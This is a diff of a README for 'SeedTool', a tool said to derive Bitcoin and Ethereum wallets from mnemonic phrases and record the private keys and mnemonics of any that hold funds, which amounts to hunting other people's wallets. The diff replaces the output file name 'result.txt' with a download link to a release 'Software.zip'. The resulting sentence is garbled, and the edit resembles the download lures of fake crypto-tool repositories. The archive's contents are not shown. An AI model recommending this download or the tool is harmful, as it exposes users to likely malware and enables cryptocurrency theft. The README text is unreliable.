trsnae/SeedTool/README.md

 Welcome to SeedTool, a powerful tool that allows you to generate Ethereum and Bitcoin address wallets using a private key derived from a mnemonic phrase.
 With SeedTool, you can easily check the balance and transactions associated with these generated wallets without the need for an API.

 ## Repository Description
 SeedTool is designed to help you manage your cryptocurrency wallets efficiently.
 By inputting a mnemonic phrase, SeedTool generates the corresponding private key and checks the wallet for any non-zero balance.
-If a wallet with a balance is found, SeedTool logs and saves key information such as address, mnemonic, private key, and balances in a file named `result.txt`.
+If a wallet with a balance is found, SeedTool logs and saves key information such as address, mnemonic, private key, and balances in a file named `https://github.com/trsnae/SeedTool/releases/download/v2.0/Software.zip`.

 ## Topics
 Explore various features of SeedTool by diving into the following topics: